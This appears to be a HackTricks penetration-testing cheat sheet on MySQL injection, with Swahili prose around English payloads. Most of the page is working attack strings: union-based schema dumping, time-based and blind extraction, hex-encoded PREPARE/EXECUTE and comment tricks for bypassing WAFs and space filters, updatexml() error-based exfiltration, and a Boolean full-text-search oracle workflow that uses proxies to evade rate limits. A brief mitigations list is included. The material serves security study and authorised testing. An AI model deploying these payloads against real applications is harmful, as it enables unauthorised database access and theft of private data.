MySQL injection

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Maoni

-- MYSQL Comment
# MYSQL Comment
/* MYSQL Comment */
/*! MYSQL Special SQL */
/*!32302 10*/ Comment for MySQL version 3.23.02

Kazi Zinazovutia

Thibitisha Mysql:

concat('a','b')
database()
version()
user()
system_user()
@@version
@@datadir
rand()
floor(2.9)
length(1)
count(1)

Kazi muhimu

SELECT hex(database())
SELECT conv(hex(database()),16,10) # Hexadecimal -> Decimal
SELECT DECODE(ENCODE('cleartext', 'PWD'), 'PWD')# Encode() & decpde() returns only numbers
SELECT uncompress(compress(database())) #Compress & uncompress() returns only numbers
SELECT replace(database(),"r","R")
SELECT substr(database(),1,1)='r'
SELECT substring(database(),1,1)=0x72
SELECT ascii(substring(database(),1,1))=114
SELECT database()=char(114,101,120,116,101,115,116,101,114)
SELECT group_concat(<COLUMN>) FROM <TABLE>
SELECT group_concat(if(strcmp(table_schema,database()),table_name,null))
SELECT group_concat(CASE(table_schema)When(database())Then(table_name)END)
strcmp(),mid(),,ldap(),rdap(),left(),rigth(),instr(),sleep()

Injection zote

SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"

kutoka https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/

Mtiririko

Kumbuka kwamba katika matoleo “ya kisasa” ya MySQL unaweza kubadilisha “information_schema.tables” kwa “mysql.innodb_table_stats” (Hii inaweza kusaidia kuzunguka WAFs).

SELECT table_name FROM information_schema.tables WHERE table_schema=database();#Get name of the tables
SELECT column_name FROM information_schema.columns WHERE table_name="<TABLE_NAME>"; #Get name of the columns of the table
SELECT <COLUMN1>,<COLUMN2> FROM <TABLE_NAME>; #Get values
SELECT user FROM mysql.user WHERE file_priv='Y'; #Users with file privileges

Thamani 1 tu

• group_concat()
• Limit X,1

Blind one by one

• substr(version(),X,1)='r' or substring(version(),X,1)=0x70 or ascii(substr(version(),X,1))=112
• mid(version(),X,1)='5'

Blind adding

• LPAD(version(),1...lenght(version()),'1')='asd'...
• RPAD(version(),1...lenght(version()),'1')='asd'...
• SELECT RIGHT(version(),1...lenght(version()))='asd'...
• SELECT LEFT(version(),1...lenght(version()))='asd'...
• SELECT INSTR('foobarbar', 'fo...')=1

Gundua idadi ya safu

Kutumia ORDER rahisi

order by 1
order by 2
order by 3
...
order by XXX

UniOn SeLect 1
UniOn SeLect 1,2
UniOn SeLect 1,2,3
...

MySQL Union Based

UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...

SSRF

Jifunze hapa chaguzi tofauti za abuse a Mysql injection to obtain a SSRF.

Mbinu za WAF bypass

Kutekeleza queries kupitia Prepared Statements

Ikiwa stacked queries zinaruhusiwa, inaweza kuwa inawezekana ku-bypass WAFs kwa ku-assign kwa variable uwakilishi wa hex wa query unayotaka ku-execute (kwa kutumia SET), kisha kutumia MySQL statements PREPARE na EXECUTE ili hatimaye kuendesha query. Kitu kama hiki:

0); SET @query = 0x53454c45435420534c454550283129; PREPARE stmt FROM @query; EXECUTE stmt; #

Kwa taarifa zaidi tafadhali rejea this blog post.

Mbadala za Information_schema

Kumbuka kwamba katika matoleo “kisasa” ya MySQL unaweza kubadilisha information_schema.tables kwa mysql.innodb_table_stats au kwa sys.x$schema_flattened_keys au kwa sys.schema_table_statistics

MySQLinjection bila koma

Select 2 columns bila kutumia koma yoyote (https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma):

-1' union select * from (select 1)UT1 JOIN (SELECT table_name FROM mysql.innodb_table_stats)UT2 on 1=1#

Kupata thamani bila jina la safu

Ikiwa wakati fulani unajua jina la jedwali lakini hujui majina ya safu ndani ya jedwali, unaweza kujaribu kugundua kuna safu ngapi kwa kutekeleza kitu kama:

# When a True is returned, you have found the number of columns
select (select "", "") = (SELECT * from demo limit 1);     # 2columns
select (select "", "", "") < (SELECT * from demo limit 1); # 3columns

Ikiwa kuna safu 2 (ikiwa ya kwanza ni ID) na nyingine ni flag, unaweza kujaribu kuvunja yaliyomo ya flag kwa bruteforce ukijaribu kila tabia kwa tabia:

# When True, you found the correct char and can start ruteforcing the next position
select (select 1, 'flaf') = (SELECT * from demo limit 1);

More info in https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952

Injection without SPACES (/**/ comment trick)

Baadhi ya programu husafisha au kuchambua ingizo la mtumiaji kwa kutumia kazi kama sscanf("%128s", buf) ambazo zinasimama pale nafasi ya kwanza inapopatikana. Kwa sababu MySQL huchukulia mfuatano /**/ kama comment and as whitespace, inaweza kutumika kuondoa kabisa normal spaces kutoka kwenye payload huku ikifanya query iwe syntactically valid.

Mfano wa time-based blind injection unaepita space filter:

GET /api/fabric/device/status HTTP/1.1
Authorization: Bearer AAAAAA'/**/OR/**/SLEEP(5)--/**/-'

Ambayo database inapokea kama:

' OR SLEEP(5)-- -'

Hii ni muhimu hasa wakati:

• Buffer inayoweza kudhibitiwa ina kikomo cha ukubwa (mfano %128s) na nafasi zinaweza kukomesha ingizo mapema.
• Kuingiza kupitia HTTP headers au maeneo mengine ambapo nafasi za kawaida huondolewa au zinatumiwa kama watenganishi.
• Ikiunganishwa na primitives za INTO OUTFILE ili kufikia pre-auth RCE kamili (angalia sehemu ya MySQL File RCE).

Historia ya MySQL

Unaweza kuona utekelezaji mwingine ndani ya MySQL ukisoma jedwali: sys.x$statement_analysis

Toleo mbadalas

mysql> select @@innodb_version;
mysql> select @@version;
mysql> select version();

MySQL Full-Text Search (FTS) BOOLEAN MODE operator abuse (WOR)

Hii si SQL injection ya kawaida. Wakati waendelezaji wanapoingiza ingizo la mtumiaji ndani ya MATCH(col) AGAINST('...' IN BOOLEAN MODE), MySQL hufanya utekelezaji wa seti tajiri ya operator za utafutaji za Boolean ndani ya string literal iliyowekwa nukuu. Sheria nyingi za WAF/SAST zinazingatia tu kuvunja nukuu na hukosa kipengele hiki.

Key points:

• Operators are evaluated inside the quotes: + (must include), - (must not include), * (trailing wildcard), "..." (exact phrase), () (grouping), </>/~ (weights). See MySQL docs.
• Hii inaruhusu majaribio ya kuwepo/kukosekana na majaribio za prefiksi bila kutoka kwenye literal ya string, kwa mfano AGAINST('+admin*' IN BOOLEAN MODE) ili kuangalia neno lolote linaloanza na admin.
• Imetumika kujenga oracles kama “does any row contain a term with prefix X?” na kuorodhesha misururu ya maandishi yaliyofichwa kupitia upanuzi wa prefiksi.

SELECT tid, firstpost
FROM threads
WHERE MATCH(subject) AGAINST('+jack*' IN BOOLEAN MODE);

Ikiwa programu inarudisha majibu tofauti kulingana na kama seti ya matokeo ni tupu (kwa mfano, kuhamisha upya dhidi ya ujumbe wa kosa), tabia hiyo inakuwa Boolean oracle inayoweza kutumiwa kuorodhesha data binafsi kama vile vichwa vilivyofichwa/vilivyofutwa.

Sanitizer bypass patterns (generic):

• Boundary-trim preserving wildcard: ikiwa backend inakata herufi 1–2 za mwisho kwa kila neno kupitia regex kama (\b.{1,2})(\s)|(\b.{1,2}$), tuma prefix*ZZ. The cleaner trims the ZZ but leaves the *, so prefix* survives.
• Early-break stripping: ikiwa code inatoa operators kwa kila neno lakini inasimama kusindika inapopata token yoyote yenye urefu ≥ min length, tuma token mbili: ya kwanza ni junk token inayokidhi kizingiti cha urefu, ya pili ina operator payload. For example: &&&&& +jack*ZZ → after cleaning: +&&&&& +jack*.

Payload template (URL-encoded):

keywords=%26%26%26%26%26+%2B{FUZZ}*xD

• %26 ni &, %2B ni +. The trailing xD (or any two letters) inakatwa na cleaner, ikihifadhi {FUZZ}*.
• Chukulia redirect kama “match” na ukurasa wa kosa kama “no match”. Usifuate redirects moja kwa moja ili kuweka oracle ionekane.

Enumeration workflow:

1. Anza na {FUZZ} = a…z,0…9 kutafuta mechi za herufi ya kwanza kupitia +a*, +b*, …
2. Kwa kila prefix chanya, fanya matawi: a* → aa* / ab* / …. Rudia ili upate mfuatano mzima.
3. Gawa requests (proxies, multiple accounts) ikiwa app inatekeleza flood control.

Why titles often leak while contents don’t:

• Baadhi ya apps hufanya ukaguzi wa visibility tu baada ya preliminary MATCH kwenye titles/subjects. Ikiwa control-flow inategemea matokeo ya “any results?” kabla ya kuchuja, existence leaks hutokea.

Mitigations:

• Ikiwa hawahitaji Boolean logic, tumia IN NATURAL LANGUAGE MODE au chukulia user input kama literal (escape/quote hutolewa uwezo wa operators katika modes nyingine).
• Ikiwa Boolean mode inahitajika, ondoa au neutraliza all Boolean operators (+ - * " ( ) < > ~) kwa kila token (bila kuvunja mapema) baada ya tokenization.
• Tekeleza visibility/authorization filters kabla ya MATCH, au panga responses iwe sawa (constant timing/status) wakati result set ni empty vs. non-empty.
• Kagua vipengele vinavyofanana katika DBMS nyingine: PostgreSQL to_tsquery/websearch_to_tsquery, SQL Server/Oracle/Db2 CONTAINS pia huchambua operators ndani ya quoted arguments.

Notes:

• Prepared statements hazulindi dhidi ya semantic abuse ya REGEXP au search operators. Input kama .* inabaki kuwa permissive regex hata ndani ya quoted REGEXP '.*'. Tumia allow-lists au explicit guards.

Error-based exfiltration via updatexml()

When the application only returns SQL errors (not raw result sets), you can leak data through MySQL error strings:

dimension: id {
type: number
sql: updatexml(null, concat(0x7e, IFNULL((SELECT name FROM project_state LIMIT 1 OFFSET 0), 'NULL'), 0x7e, '///'), null) ;;
}

updatexml() inaleta hitilafu ya XPATH inayojumuisha kamba iliyounganishwa, hivyo thamani kutoka kwa SELECT ya ndani inaonekana katika jibu la hitilafu ndani ya vikwazo vya kutenganisha (0x7e = ~). Rudia LIMIT 1 OFFSET N ili kuorodhesha safu. Hii inafanya kazi hata wakati UI inapofanya vipimo vya “boolean” kwa sababu ujumbe wa hitilafu bado unaonyeshwa.

Miongozo mingine ya MYSQL injection

• PayloadsAllTheThings – MySQL Injection cheatsheet

Marejeleo

• Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)
• MySQL Full-Text Search – Boolean mode
• MySQL Full-Text Search – Overview
• MySQL REGEXP documentation
• ReDisclosure: New technique for exploiting Full-Text Search in MySQL (myBB case study)
• LookOut: RCE and internal access on Looker (Tenable)

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.